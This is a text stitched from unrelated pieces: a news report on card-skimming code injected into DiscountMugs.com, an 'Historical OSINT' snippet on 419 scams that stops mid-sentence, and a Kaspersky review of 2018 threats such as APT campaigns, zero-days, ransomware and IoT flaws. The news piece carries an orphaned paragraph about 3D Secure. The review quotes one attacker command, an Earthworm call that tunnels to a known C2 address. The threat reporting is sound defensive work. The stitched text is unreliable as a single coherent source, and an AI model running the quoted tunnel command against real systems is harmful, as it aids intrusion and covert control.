Shoppers who placed an order with discountmugs.com during a four-month period last year are receiving a worrying notification from the online apparel store. Apparently, hackers injected card skimming code into the company’s website, then stole enough customer data to conduct fraud.

In a letter to the state attorney general, the company explains what happened, what information the hackers took, and what the company is doing to remedy this embarrassing situation. From the letter:

“On November 16, 2018, we discovered that an unauthorized change had been made to our DiscountMugs.com website. We immediately initiated an investigation and learned that unauthorized code was inserted into our shopping cart page designed to collect information customers entered on that page. We immediately removed the unauthorized code and reported the matter to law enforcement and to the payment card companies.

By Dec. 20, the company said, its investigation found that “orders placed by credit or debit cards between August 5, 2018 and November 16, 2018, may have been impacted by the unauthorized code. We are providing you with this notice because our records indicate that you placed an order between August 5, 2018 and November 16, 2018.”

This email would undoubtedly alarm any recipient, but the paragraph that follows is even more chilling. It shows the malware siphoned off exactly the data hackers needed to conduct fraud:

“… name, address, phone number, email address, the credit card or debit card number used to place the order, the expiration date, and card security code (CVV2) for that card.”

The paragraph ends by offering some comfort to victims: “Since we do not request PINs when debit cards are used, PINs were not subject to collection.”

But not every card emitter offers the 3D Secure mechanism, and not every e-commerce website uses two-factor-authentication for transactions. Moreover, verifiability of site identity is not 100% bulletproof, because the system involves a pop-up window or inline frame requiring cardholders to enter the one-time password to verify their legitimacy. However, a hacked website might display a fraudulent pop-up designed to harvest passwords.

After learning of the breach, DiscountMugs launched an investigation and, with the help of an unnamed cybersecurity firm, removed the malicious code. It is now helping police and card issuers with their investigations into the breach. Affected customers are offered a reassuring “we do not have any evidence that your information has been misused,” but the company still advises them to review an enclosed document with further information and steps they can take to prevent any harm done. The shop is also offering a complementary year of identity monitoring through AllClear ID.

DiscountMugs fails to mention how many customers were impacted. According to TechCrunch, the shop ranks in the top 10,000 sites in the U.S., with a daily customer count in the thousands.

Historical OSINT – Profiling a Portfolio of Active 419-Themed Scams

It's 2010 and I've recently decided to provide actionable intelligence on a variety of 419-themed scams in particular the actual malicious actors behind the campaigns with the idea to empower law enforcement and the community with the necessary data to track down and prosecute the malicious actors behind these campaigns. Related malicious and fraudulent emails known to have participated in the

Kaspersky Security Bulletin 2018. Top security stories

Introduction

The internet is now woven into the fabric of our lives. Many people routinely bank, shop and socialize online and the internet is the lifeblood of commercial organizations. The dependence on technology of governments, businesses and consumers provides a broad attack surface for attackers with all kinds of motives – financial theft, theft of data, disruption, damage, reputational damage or simply ‘for the lulz’. The result is a threat landscape that ranges from highly sophisticated targeted attacks to opportunistic cybercrime. All too often, both rely on manipulating human psychology as a way of compromising entire systems or individual computers. Increasingly, the devices targeted also include those that we don’t consider to be computers – from children’s toys to security cameras. Here is our annual round-up of major incidents and key trends from 2018

Targeted attack campaigns

At this year’s Security Analyst Summit we reported on Slingshot – a sophisticated cyber-espionage platform that has been used to target victims in the Middle East and Africa since 2012. We discovered this threat – which rivals Regin and ProjectSauron in its complexity – during an incident investigation. Slingshot uses an unusual (and, as far as we know, unique) attack vector: many of the victims were attacked by means of compromised MikroTik routers. The exact method for compromising the routers is not clear, but the attackers have found a way to add a malicious DLL to the device: this DLL is a downloader for other malicious files that are then stored on the router. When a system administrator logs in to configure the router, the router’s management software downloads and runs a malicious module on the administrator’s computer. Slingshot loads a number of modules on a compromised computer, but the two most notable are Cahnadr and GollumApp – which are, respectively, kernel mode and user mode modules. Together, they provide the functionality to maintain persistence, manage the file system, exfiltrate data and communicate with the C2 (command-and-control) server. The samples we looked at were marked as ‘version 6.x’, suggesting that the threat has existed for a considerable length of time. The time, skill and cost involved in creating Slingshot indicates that the group behind it is likely to be highly organized and professional, and probably state sponsored.

Soon after the start of the Winter Olympics in Pyeongchang, we began receiving reports of malware attacks on infrastructure related to the games. Olympic Destroyer shut down display monitors, killed Wi-Fi and took down the Olympics website – preventing visitors from printing tickets. The attack also affected other organizations in the region – for example, ski gates and ski lifts were disabled at several South Korean ski resorts. Olympic Destroyer is a network worm, the main aim of which is to wipe files from remote network shares of its victims. In the days that followed the attack, research teams and media companies around the world variously attributed the attack to Russia, China and North Korea – based on a number of features previously attributed to cyber-espionage and sabotage groups allegedly based in those countries or working for the governments of those countries. Our own researchers were also trying to understand which group was behind the attack. At one stage during our research, we discovered something that seemed to indicate that the Lazarus group was behind the attack. We found a unique trace left by the attackers that exactly matched a previously known Lazarus malware component. However, the lack of obvious motive and inconsistencies with known Lazarus TTPs (tactics, techniques and procedures) that we found during our on-site investigation at a compromised facility in South Korea led us to look again at this artefact. When we did so, we discovered that the set of features didn’t match the code – it had been forged to perfectly match the fingerprint used by Lazarus. So we concluded that the ‘fingerprint’ was a very sophisticated false flag, intentionally placed inside the malware in order to give threat hunters the impression that they had found a ‘smoking gun’ and diverting them from a more accurate attribution.


OlympicDestroyer component relations

We continued to track this APT group’s activities and noticed in June that they had started a new campaign with a different geographical distribution and using new themes. Our telemetry, and the characteristics of the spear-phishing documents we analysed, indicated that the attacker behind Olympic Destroyer was targeting financial and biotechnology-related organizations based in Europe – specifically, Russia, the Netherlands, Germany, Switzerland and Ukraine. The earlier Olympic Destroyer attacks – designed to destroy and paralyze the infrastructure of the Winter Olympic Games and related supply chains, partners and venues – were preceded by a reconnaissance operation. This suggested to us that the new activities were part of another reconnaissance stage that would be followed by a wave of destructive attacks with new motives. The variety of financial and non-financial targets could indicate that the same malware was being used by several groups with different interests. This could also be the result of cyberattack outsourcing, which is not uncommon among nation-state threat actors. However, it’s also possible that the financial targets are another false-flag operation by a threat actor that has already shown that they excel at this.

In April, we reported the workings of Operation Parliament, a cyber-espionage campaign aimed at high-profile legislative, executive and judicial organizations around the world – with its main focus in the Middle East and North Africa region, especially Palestine. The attacks, which started early in 2017, targeted parliaments, senates, top state offices and officials, political science scholars, military and intelligence agencies, ministries, media outlets, research centers, election commissions, Olympic organizations, large trading companies and others. The targeting of victims was unlike that of previous campaigns in the region (Gaza Cybergang or Desert Falcons) and points to an elaborate information-gathering exercise that was carried out prior to the attacks (physical and/or digital). The attackers have been particularly careful to verify victim devices before proceeding with the infection, safeguarding their C2 servers. The attacks slowed down after the start of 2018, probably because the attackers achieved their objectives.

We have continued to track the activities of Crouching Yeti (aka Energetic Bear), an APT group that has been active since at least 2010, mainly targeting energy and industrial companies. The group targets organizations around the world, but with a particular focus on Europe, the US and Turkey – the latter being a new addition to the group’s interests during 2016-17. The group’s main tactics include sending phishing emails with malicious documents and infecting servers for different purposes, including hosting tools and logs and watering-hole attacks. Crouching Yeti’s activities against US targets have been publicly discussed by US-CERT and the UK National Cyber Security Centre (NCSC). In April, Kaspersky Lab ICS CERT provided information on identified servers infected and used by Crouching Yeti and presented the findings of an analysis of several web servers compromised by the group during 2016 and early 2017. You can read the full report here, but below is a summary of our findings.

  1. With rare exceptions, the group’s members get by with publicly available tools. The use of publicly available utilities by the group to conduct its attacks renders the task of attack attribution without any additional group ‘markers’ very difficult.
  2. Potentially, any vulnerable server on the internet is of interest to the attackers when they want to establish a foothold in order to develop further attacks against target facilities.
  3. In most cases that we have observed, the group performed tasks related to searching for vulnerabilities, gaining persistence on various hosts, and stealing authentication data.
  4. The diversity of victims may indicate the diversity of the attackers’ interests.
  5. It can be assumed with some degree of certainty that the group operates in the interests of or takes orders from customers that are external to it, performing initial data collection, the theft of authentication data and gaining persistence on resources that are suitable for the attack’s further development.

In May, researchers from Cisco Talos published the results of their research into VPNFilter, malware used to infect different brands of router – mainly in Ukraine, although affecting routers in 54 countries in total. You can read their analysis here and here. Initially, they believed that the malware had infected around 500,000 routers – Linksys, MikroTik, Netgear and TP-Link networking equipment in the small office/home office (SOHO) sector, and QNAP network-attached storage (NAS) devices. However, it later became clear that the list of infected routers was much longer – 75 in total, including ASUS, D-Link, Huawei, Ubiquiti, UPVEL and ZTE. The malware is capable of bricking the infected device, executing shell commands for further manipulation, creating a TOR configuration for anonymous access to the device or configuring the router’s proxy port and proxy URL to manipulate browsing sessions. However, it also spreads into networks supported by the device, thereby extending the scope of the attack. Researchers from our Global Research and Analysis Team (GReAT) took a detailed look at the C2 mechanism used by VPNFilter. One of the interesting questions is who is behind this malware. Cisco Talos indicated that a state-sponsored or state affiliated threat actor is responsible. In its affidavit for sink-holing the C2, the FBI suggests that Sofacy (aka APT28, Pawn Storm, Sednit, STRONTIUM, and Tsar Team) is the culprit. There is some code overlap with the BlackEnergy malware used in previous attacks in Ukraine (the FBI’s affidavit makes it clear that they see BlackEnergy (aka Sandworm) as a sub-group of Sofacy).

Sofacy is a highly active and prolific cyber-espionage group that Kaspersky Lab has been tracking for many years. In February, we published an overview of Sofacy activities in 2017, revealing a gradual move away from NATO-related targets at the start of 2017, towards targets in the Middle East, Central Asia and beyond. Sofacy uses spear-phishing and watering-hole attacks to steal information, including account credentials, sensitive communications and documents. This threat actor also makes use of zero-day vulnerabilities to deploy its malware.

Sofacy deploys different tools for different target profiles. Early in 2017 the group’s Dealer’s Choice campaign was used to target military and diplomatic organizations (mainly in NATO countries and Ukraine). Later in the year, the group used other tools from its arsenal, Zebrocy and SPLM, to target a broader range of organizations, including science and engineering centers and press services, with more of a focus on Central Asia and the Far East. Like other sophisticated threat actors, Sofacy continually develops new tools, maintains a high level of operational security and focuses on making its malware hard to detect. Once any signs of activity by an advanced threat actor such as Sofacy have been found in a network, it’s important to review logins and unusual administrator access on systems, thoroughly scan and sandbox incoming attachments, and maintain two-factor authentication for services such as email and VPN access. The use of APT intelligence reports, threat hunting tools such as YARA and advanced detection solutions such as KATA (Kaspersky Anti Targeted Attack Platform) will help you to understand their targeting and provide powerful ways of detecting their activities.

Our research shows that Sofacy is not the only threat actor operating in the Far East and this sometimes results in a target overlap between very different threat actors. We have seen cases where the Sofacy Zebrocy malware has competed for access to victims’ computers with the Russian-speaking Mosquito Turla clusters; and where its SPLM backdoor has competed with the traditional Turla and Chinese-speaking Danti attacks. The shared targets included government administration, technology, science and military-related organizations in or from Central Asia. The most intriguing overlap is probably that between Sofacy and the English-speaking threat actor behind the Lamberts family. The connection was discovered after researchers detected the presence of Sofacy on a server that threat intelligence had previously identified as compromised by Grey Lambert malware. The server belongs to a Chinese conglomerate that designs and manufactures aerospace and air defense technologies. However, in this case the original SPLM delivery vector remains unknown. This raises a number of hypothetical possibilities, including the fact that Sofacy could be using a new, and as yet undetected, exploit or a new strain of its backdoor, or that Sofacy somehow managed to harness Grey Lambert’s communication channels to download its malware. It could even be a false flag, planted during the previous Lambert infection. We think that the most likely answer is that an unknown new PowerShell script or legitimate but vulnerable web app was exploited to load and execute the SPLM code.

In June, we reported an ongoing campaign targeting a national data centre in Central Asia. The choice of target was especially significant – it means that the attackers were able to gain access to a wide range of government resources in one fell swoop. We think they did this by inserting malicious scripts into the country’s official websites in order to conduct watering-hole attacks. We attribute this campaign to the Chinese-speaking threat actor, LuckyMouse (aka EmissaryPanda and APT27) because of the tools and tactics used in the campaign, because the C2 domain – ‘update.iaacstudio[.]com’ – was previously used by this group and because they have previously targeted government organizations, including Central Asian ones. The initial infection vector used in the attack against the data center is unclear. Even where we observed LuckyMouse using weaponized documents with CVE-2017-118822 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors since December 2017), we couldn’t prove that they were related to this particular attack. It’s possible that the attackers used a watering hole to infect data center employees.

We reported another LuckyMouse campaign in September. Since March, we had found several infections where a previously unknown Trojan was injected into the ‘lsass.exe’ system process memory. These implants were injected by the digitally signed 32- and 64-bit network filtering driver NDISProxy. Interestingly, this driver is signed with a digital certificate that belongs to the Chinese company LeagSoft, a developer of information security software based in Shenzhen, Guangdong. We informed the company about the issue via CN-CERT. This campaign targeted Central Asian government organizations and we believe the attack was linked to a high-level meeting in the region. The choice of the Earthworm tunneler used in the attack is typical for Chinese-speaking actors. Also, one of the commands used by the attackers (‘-s rssocks -d 103.75.190[.]28 -e 443’) creates a tunnel to a previously known LuckyMouse C2 server. The choice of victims in this campaign also aligns with the previous interests shown by this threat actor. We did not see any indications of spear-phishing or watering-hole activity: and we think that the attackers spread their infectors through networks that were already compromised.

Lazarus is a well-established threat actor that has conducted cyber-espionage and cybersabotage campaigns since at least 2009. In recent years, the group has launched campaigns against financial organizations around the globe. In August we reported that the group had successfully compromised several banks and infiltrated a number of global crypto-currency exchanges and fintech companies. While assisting with an incident response operation, we learned that the victim had been infected with the help of a Trojanized crypto-currency trading application that had been recommended to the company over email. An unsuspecting employee had downloaded a third-party application from a legitimate looking website, infecting their computer with malware known as Fallchill, an old tool that Lazarus has recently started using again. It seems as though Lazarus has found an elaborate way to create a legitimate looking site and inject a malicious payload into a ‘legitimate looking’ software update mechanism – in this case, creating a fake supply chain rather than compromising a real one. At any rate, the success of the Lazarus group in compromising supply chains suggests that it will continue to exploit this method of attack. The attackers went the extra mile and developed malware for non-Windows platforms – they included a Mac OS version and the website suggests that a Linux version is coming soon. This is probably the first time that we’ve seen this APT group using malware for Mac OS. It looks as though, in the chase after advanced targets, software developers from supply chains and some high-profile targets, threat actors are forced to develop Mac OS malware tools. The fact that the Lazarus group has expanded its list of targeted operating systems should be a wake-up call for users of non-Windows platforms. You can read our report on Operation AppleJeus here.

Turla (aka Venomous Bear, Waterbug, and Uroboros) is best known for what was, at the time, an ultra-complex Snake rootkit focused on NATO-related targets. However, this threat actor’s activity is much broader. In October, we reported on the Turla group’s recent activities, revealing an interesting mix of old code, new code, and new speculations as to where they will strike next and what they will shed. Much of our 2018 research focused on the group’s KopiLuwak JavaScript backdoor, new variants of the Carbon framework and Meterpreter delivery techniques. Other interesting aspects were the changing Mosquito delivery techniques, customized PoshSec-Mod open-source PowerShell use and borrowed injector code. We tied some of this activity together with infrastructure and data points from WhiteBear and Mosquito infrastructure and activity in 2017 and 2018. One interesting aspect of our research was the lack of ongoing targeting overlap with other APT activity. Turla was absent from the milestone DNC hack event – where Sofacy and CozyDuke were both present – but the group was quietly active around the globe on other projects. This provides some insight into the ongoing motivations and ambitions of the group. It is interesting that data related to these organizations has not been weaponized and found online while this Turla activity quietly carries on. Both Mosquito and Carbon projects focus mainly on diplomatic and foreign affairs targets, while WhiteAtlas and WhiteBear activity stretched across the globe to include organizations related to foreign affairs, but not all targeting has consistently followed this profile: the group also targeted scientific and technical centres, along with organizations outside the political arena. The group’s KopiLuwak activity does not necessarily focus on diplomatic and foreign affairs. Instead, 2018 activity targeted government-related scientific and energy research organizations and a government-related communications organization in Afghanistan. This highly selective but wider targeting set will probably continue into 2019.

In October, we reported the recent activity of the MuddyWater APT group. Our past telemetry indicates that this relatively new threat actor, which surfaced in 2017, has focused mainly on government targets in Iraq and Saudi Arabia. However, the group behind MuddyWater has been known to target other countries in the Middle East, Europe and the US. We recently noticed a large number of spear-phishing documents that appear to be targeting government bodies, military entities, telcos and educational institutions in Jordan, Turkey, Azerbaijan and Pakistan, in addition to the continuous targeting of Iraq and Saudi Arabia. Other victims were detected in Mali, Austria, Russia, Iran and Bahrain. These new documents have appeared throughout 2018 and the activity escalated from May onwards. The new spear-phishing documents rely on social engineering to persuade the victims to enable macros. The attackers rely on a range of compromised hosts to deliver their attacks. In the advanced stages of our research, we were able not only to observe additional files and tools from the group’s arsenal but also some OPSEC mistakes made by the attackers. In order to protect against malware attacks, we would recommend the following measures:

  • Educate general staff so that they are able to identify malicious behaviour such as phishing links.
  • Educate information security staff to ensure that they have full configuration, investigative and hunting abilities.
  • Use a proven corporate-grade security solution in combination with anti-targeted attack solutions capable of detecting attacks by analyzing network anomalies.
  • Provide security staff with access to the latest threat intelligence data, which will arm them with helpful tools for targeted attack prevention and discovery, such as IoCs (indicators of compromise) and YARA rules.
  • Establish enterprise-grade patch management processes.

High-profile organizations should adopt elevated levels of cybersecurity, since attacks against them are inevitable and are unlikely to ever cease.

DustSquad is another threat actor that has targeted organizations in Central Asia. Kaspersky Lab has been monitoring this Russian language cyber-espionage group for the last two years, providing private intelligence reports to our customers on four of their campaigns involving custom Android and Windows malware. Recently, we described a malicious program called Octopus, used by DustSquad to target diplomatic bodies in the region – the name was originally coined by ESET in 2017, after the 0ct0pus3.php script used by the actor on their old C2 servers. Using the Kaspersky Attribution Engine, based on similarity algorithms, we discovered that Octopus is related to DustSquad. In our telemetry, we tracked this campaign back to 2014 in the former Soviet republics of Central Asia (still mostly Russian-speaking) and in Afghanistan. In April, we discovered a new Octopus sample masquerading as Telegram Messenger with a Russian interface. We were unable to find legitimate software that this malware is impersonating – in fact, we don’t believe it exists. However, the attackers used the potential Telegram ban in Kazakhstan to push its dropper as alternative communication software for the political opposition. By subscribing to our APT intelligence reports, you can get access to our investigations and discoveries as they happen, including comprehensive technical data.

In October, we published our analysis of Dark Pulsar. Our investigation started in March 2017, when the Shadow Brokers published stolen data that included two frameworks – DanderSpritz and FuzzBunch. DanderSpritz contains various types of plugin designed to analyze victims, exploit vulnerabilities, schedule tasks, etc. The DanderSpritz framework is designed to examine already controlled machines and gather intelligence. Together, they provide a very powerful platform for cyber-espionage. The leak didn’t include the Dark Pulsar backdoor itself: rather, it contained an administrative module for controlling the backdoor. However, by creating special signatures based on some magic constants in the administrative module, we were able to catch the implant itself. This implant gives the attackers remote control over compromised devices. We found 50 victims, all located in Russia, Iran and Egypt, but we believe there were probably many more. For one thing, the DanderSpritz interface is able to manage a large number of victims at the same time. In addition, the attackers often delete their malware once the campaign has ended. We think that the campaign stopped following the ‘Lost in Translation’ leak by the Shadow Brokers in April 2017. You can find our suggested mitigation strategies for complex threats such as Dark Pulsar here.

Mobile APT campaigns

The mobile APT threats segment saw three significant events: the detection of the Zoopark, BusyGasper and Skygofree cyber-espionage campaigns.

Technically, all three are well-designed and similar in their primary purpose – spying on selected victims. Their main aim is to steal all available personal data from a mobile device: interception of calls, messages, geolocation, etc. There is even a function for eavesdropping via the microphone – the smartphone is used as a ‘bug’ that doesn’t even need to be hidden from an unsuspecting target.

The cybercriminals paid particular attention to the theft of messages from popular instant messaging services, which have now largely replaced standard means of communication. In several cases, the attackers used exploits that were capable of escalating the Trojans’ local privileges on a device, opening up virtually unlimited access to remote monitoring, and often device management.

Keylogger functionality was also implemented in two of the three malicious programs, with the cybercriminals recording every keystroke on a device’s keyboard. It’s noteworthy that in order to intercept clicks the attackers didn’t even require elevated privileges.

Geographically, victims were recorded in a variety of countries: Skygofree targeted users in Italy, BusyGasper attacked individual Russian users, and Zoopark operated in the Middle East.

It’s also worth noting that there’s an increasingly prominent trend of criminals involved in espionage showing a preference for mobile platforms, because they offer a lot more personal data.

Exploits

Exploiting vulnerabilities in software and hardware remains an important means of compromising devices of all kinds.

Early this year, two severe vulnerabilities affecting Intel CPUs were reported. Dubbed Meltdown and Spectre respectively, they both allow an attacker to read memory from any process and from its own process respectively. The vulnerabilities have been around since at least 2011. Meltdown (CVE-2017-5754) affects Intel CPUs and allows an attacker to read data from any process on the host system. While code execution is required, this can be obtained in various ways – for example, through a software bug or by visiting a malicious website that loads JavaScript code that executes the Meltdown attack. This means that all the data residing in memory (passwords, encryption keys, PINs, etc.) could be read if the vulnerability is exploited properly. Vendors were quick to publish patches for the most popular operating systems. The Microsoft update, released on January 3, was not compatible with all antivirus programs – possibly resulting in a BSoD (Blue Screen of Death) on incompatible systems. So updates could only be installed if an antivirus product had first set a specific registry key, to indicate that there were no compatibility problems. Spectre (CVE-2017-5753 and CVE-2017-5715) is slightly different. Unlike Meltdown, this attack also works on other architectures (such as AMD and ARM). Also, Spectre is only able to read the memory space of the exploited process, and not that of any process. More importantly, aside from some countermeasures in some browsers, no universal solution is readily available for Spectre. It became clear in the weeks following the reports of the vulnerabilities that they are not easily fixable. Most of the released patches have reduced the attack surface, mitigating against known ways of exploiting the vulnerabilities, but they don’t eradicate the danger completely. Since the problem is fundamental to the working of the vulnerable CPUs, it was clear that vendors would probably have to grapple with new exploits for years to come. In fact, it didn’t take years. In July, Intel paid out a $100,000 bug bounty for new processor vulnerabilities related to Spectre variant one (CVE-2017-5753). Spectre 1.1 (CVE-2018-3693) can be used to create speculative buffer overflows. Spectre 1.2 allows an attacker to overwrite read-only data and code pointers to breach sandboxes on CPUs that don’t enforce read-write protections. These new vulnerabilities were uncovered by MIT researcher Vladimir Kiriansky and independent researcher Carl Waldspurger.

On April 18, someone uploaded an interesting exploit to VirusTotal. This was detected by several security vendors, including Kaspersky Lab – using our generic heuristic logic for some older Microsoft Word documents. It turned out to be a new zero-day vulnerability for Internet Explorer (CVE-2018-8174) – patched by Microsoft on May 8, 2018. Following processing of the sample in our sandbox system, we noticed that it successfully exploited a fully patched version of Microsoft Word. This led us to carry out a deeper analysis of the vulnerability. The infection chain consists of the following steps. The victim receives a malicious Microsoft Word document. After opening it, the second stage of the exploit is downloaded – an HTML page containing VBScript code. This triggers a UAF (Use After Free) vulnerability and executes shellcode. Despite the initial attack vector being a Word document, the vulnerability is actually in VBScript. This is the first time we have seen a URL Moniker used to load an IE exploit in Word, but we believe that this technique will be heavily abused by attackers in the future, since it allows them to force victims to load IE, ignoring the default browser settings. It’s likely that exploit kit authors will start abusing it in both drive-by attacks (through the browser) and spear-phishing campaigns (through a document). To protect against this technique, we would recommend applying the latest security updates and using a security solution with behavior detection capabilities.

In August, our AEP (Automatic Exploit Prevention) technology detected a new kind of cyberattack that tried to use a zero-day vulnerability in the Windows driver file, ‘win32k.sys’. We informed Microsoft about the issue and on October 9 Microsoft disclosed the vulnerability (CVE-2018-8453) and published an update. This is a very dangerous vulnerability, giving attackers control over a compromised computer. The vulnerability was used in a highly targeted attack campaign on organizations in the Middle East – we found fewer than a dozen victims. We believe that these attacks were carried out by the FruityArmor threat actor.

In late October we reported another vulnerability to Microsoft, this time a zero-day elevation of privilege vulnerability in ‘win32k.sys’ – which can be used by an attacker to obtain the privileges necessary for persistence on a victim’s system. This vulnerability has also been exploited in a very limited number of attacks on organizations in the Middle East. Microsoft published an update for this vulnerability (CVE-2018-8589) on November 13. This threat was also detected by means of our proactive technologies – the advanced sandboxing and anti-malware engine for the Kaspersky Anti Targeted Attack Platform and our AEP technology.

Browser extensions – extending the reach of cybercriminals

Browser extensions can make our lives easier, hiding obtrusive advertising, translating text, helping us choose the goods we want in online stores and more. Unfortunately, there are also less desirable extensions that are used to bombard us with advertising or collect information about our activities. There are also extensions designed to steal money. Earlier this year, one of these caught our eye because it communicated with a suspicious domain. The malicious extension, named Desbloquear Conteúdo (‘Unblock Content’ in Portuguese), targeted customers of Brazilian online banking services, harvesting logins and passwords in order to obtain access to victims’ bank accounts.

In September, hackers published the private messages from at least 81,000 Facebook accounts, claiming that this was just a small fraction of a much larger haul comprising 120 million accounts. In a Dark Web advert, the attackers offered the messages for 10 cents per account. The attack was investigated by the BBC Russian Service and cybersecurity company Digital Shadows. They found that of 81,000 accounts, most were from Ukraine and Russia, although accounts from other countries were also among them, including the UK, the US and Brazil. Facebook suggested that the messages were stolen using a malicious browser extension.

Malicious extensions are quite rare, but we need to take them seriously because of the potential damage they can cause. You should only install verified extensions with large numbers of installations and reviews in the Chrome Web Store or other official service. Even so, in spite of the protection measures implemented by the owners of such services, malicious extensions can still end up being published there. So it’s a good idea to use an internet security product that gives you a warning if an extension acts suspiciously.

The World Cup of fraud

Social engineering remains an important tool in the arsenal of cyberattackers of all kinds. Fraudsters are always on the lookout for opportunities to make money off the back of major sporting events; and the FIFA World Cup is no different. Long before the event kicked off, cybercriminals had started to create phishing websites and send messages exploiting World Cup themes. These phishing messages included notifications of a fake lottery win, or a message offering tickets to one of the matches. Fraudsters often go to great lengths to mimic legitimate partner sites, creating well-designed pages and even including SSL certificates for added credibility. The criminals also extract data by mimicking official FIFA notifications: the victim receives a message telling them that the security system has been updated and all personal data must be re-entered to avoid lockout. These messages contain a link to a fake page where the scammers harvest the victim’s personal information.

You can find our report on the ways cybercriminals have exploited the World Cup in order to make money here. We also provided tips on how to avoid phishing scams – advice that holds true for any phishing scams, not just for those related to the World Cup.

In the run up to the tournament, we also analyzed wireless access points in the 11 cities hosting FIFA World Cup matches – nearly 32,000 Wi-Fi hotspots in total. While checking encryption and authentication algorithms, we counted the number of WPA2 and open networks, as well as their share among all the access points. More than a fifth of Wi-Fi hotspots were using unreliable networks. This meant that criminals simply needed to be located near an access point to intercept traffic and get their hands on people’s data. Around three quarters of all access points used WPA/WPA2 encryption, considered to be one of the most secure. The level of protection mostly depends on the settings, such as the strength of the password set by the hotspot owner. A complicated encryption key can take years to successfully hack. However, even reliable networks, like WPA2, cannot be automatically considered totally secure. They are still susceptible to brute-force, dictionary and key reinstallation attacks, for which there are a large number of tutorials and open source tools available online. Any attempt to intercept traffic from WPA Wi-Fi in public access points can also be made by penetrating the gap between the access point and the device at the beginning of the session.

You can read our report here, together with our recommendations on the safe use of Wi-Fi hotspots, advice that is valid wherever you may be – not just at the World Cup.

Financial fraud on an industrial scale

In August, Kaspersky Lab ICS CERT reported a phishing campaign designed to steal money from enterprises – primarily manufacturing companies. The attackers used standard phishing techniques to trick their victims into clicking on infected attachments, using emails disguised as commercial offers and other financial documents. The criminals used legitimate remote administration applications – either TeamViewer or RMS (Remote Manipulator System). These programs were employed to gain access to the device, scan for information on current purchases and details of financial and accounting software used by the victims. The attackers then used different ploys to steal company money – for example, by replacing the banking details in transactions. By the time we published our report, on August 1, we had seen infections on around 800 computers, spread across at least 400 organizations in a wide array of industries – including manufacturing, oil and gas, metallurgy, engineering, energy, construction, mining and logistics. The campaign has been ongoing since October 2017.

Our research highlights that, even when threat actors use simple techniques and known malware, they can successfully attack industrial companies by using social engineering tricks and hiding their code in target systems – using legitimate remote administration software to evade detection by antivirus solutions.

You can find out more about how attackers use remote administration tools to compromise their targets here, and an overview of attacks on ICS systems in the first half of 2018 here.

Ransomware – still a threat

The fall in the number of ransomware attacks in the last year or so has been well-documented. Nevertheless, this type of malware remains a significant problem and we continue to see the development of new ransomware families. Early in August, our anti-ransomware module started detecting the KeyPass Trojan. In just two days, we found this malware in more than 20 countries – Brazil and Vietnam were hardest hit, but we also found victims in Europe, Africa and the Far East. KeyPass encrypts all files, regardless of extension, on local drives and network shares that are accessible from the infected computer. It ignores some files, located in directories that are hardcoded in the malware. Encrypted files are given the additional extension ‘KEYPASS’ and ransom notes, called ‘!!!KEYPASS_DECRYPTION_INFO!!!.txt’, are saved in each directory containing encrypted files. The creators of this Trojan implemented a very simplistic scheme. The malware uses the symmetric algorithm AES-256 in CFB mode with zero IV and the same 32-byte key for all files. The Trojan encrypts a maximum of 0x500000 bytes (~5 MB) of data at the start of each file. Shortly after launch, the malware connects to its C2 server and obtains the encryption key and infection ID for the current victim. The data is transferred over plain HTTP in the form of JSON. If the C2 is unavailable – for example, if the infected computer is not connected to the internet, or the server is down – the malware uses a hardcoded key and ID. As a result, in the case of offline encryption, the decryption of the victim’s files is trivial.

Probably the most interesting feature of the KeyPass Trojan is the ability to take ‘manual control’. The Trojan contains a form that is hidden by default, but which can be shown after pressing a special button on the keyboard. This form allows the criminals to customize the encryption process by changing such parameters as the encryption key, the name of the ransom note, the text of the ransom, the victim ID, the extension of encrypted files and the list of directories to be excluded from encryption. This capability suggests that the criminals behind the Trojan might intend to use it in manual attacks.

However, it’s not only new ransomware families that are causing problems. One and a half years after the WannaCry epidemic, it continues to top the list of the most widespread cryptor families – so far, we have seen 74,621 unique attacks worldwide. These attacks accounted for 28.72% of all those targeted with cryptors in Q3 2018. This percentage has risen by two-thirds during the last year. This is especially alarming considering that a patch for the EternalBlue exploit used by WannaCry existed even before the initial epidemic in May 2017.

Asacub and banking Trojans

2018 showed the most impressive figures in terms of the number of attacks involving mobile banking Trojans. At the beginning of the year, this type of threat seemed to have leveled off both in number of unique samples detected and number of users attacked.

However, in the second quarter there was a dramatic change for the worse: record-breaking numbers of detected mobile banking Trojans and attacked users. The root cause of this significant upturn is unclear, though the main culprits were the creators of Asacub and Hqwar. An interesting feature of Asacub is its longevity: according to our data, the group behind it has been operating for more than three years.

Asacub evolved from an SMS Trojan, which from the very outset possessed techniques for preventing deletion and intercepting incoming calls and SMSs. The creators subsequently complicated the program logic and started the mass distribution of the malware. The chosen vector was the same as that at the very beginning – social engineering via SMS. However, this time the valid phone numbers were sourced from popular bulletin boards, with owners often expecting messages from unfamiliar subscribers.

The propagation technique then snowballed when the devices that the Trojan had infected started spreading the infection – Asacub self-proliferated to the victim’s entire contact list.

Smart doesn’t mean secure

These days we’re surrounded by smart devices. This includes everyday household objects such as TVs, smart meters, thermostats, baby monitors and children’s toys. But it also includes cars, medical devices, CCTV cameras and parking meters. We’re even seeing the emergence of smart cities. However, this offers a greater attack surface to anyone looking to take advantage of security weaknesses – for whatever purpose. Securing traditional computers is difficult. But things are more problematic with the internet of things (IoT), where lack of standardization leaves developers to ignore security, or consider it as an afterthought. There are plenty of examples to illustrate this.

In February, we explored the possibility that a smart hub might be vulnerable to attack. A smart hub lets you control the operation of other smart devices in the home, receiving information and issuing commands. Smart hubs might be controlled through a touch screen, or through a mobile app or web interface. If it’s vulnerable, it would potentially provide a single point of failure. While the smart hub our researchers investigated didn’t contain significant vulnerabilities, there were logical mistakes that were enough to allow our researchers to obtain remote access.

Researchers at Kaspersky Lab ICS CERT checked a popular smart camera to see how well protected it is from hackers. Smart cameras are now part of everyday life. Many now connect to the cloud, allowing someone to monitor what’s happening at a remote location – to check on pets, for security surveillance, etc. The model our researchers investigated is marketed as an all-purpose tool – suitable for use as a baby monitor, or as part of a security system. The camera is able to see in the dark, follow a moving object, stream footage to a smartphone or tablet and play back sound through a built-in speaker. Unfortunately, the camera turned out to have 13 vulnerabilities – almost as many as it has features – that could allow an attacker to change the administrator password, execute arbitrary code on the device, build a botnet of compromised cameras or stop it functioning completely.

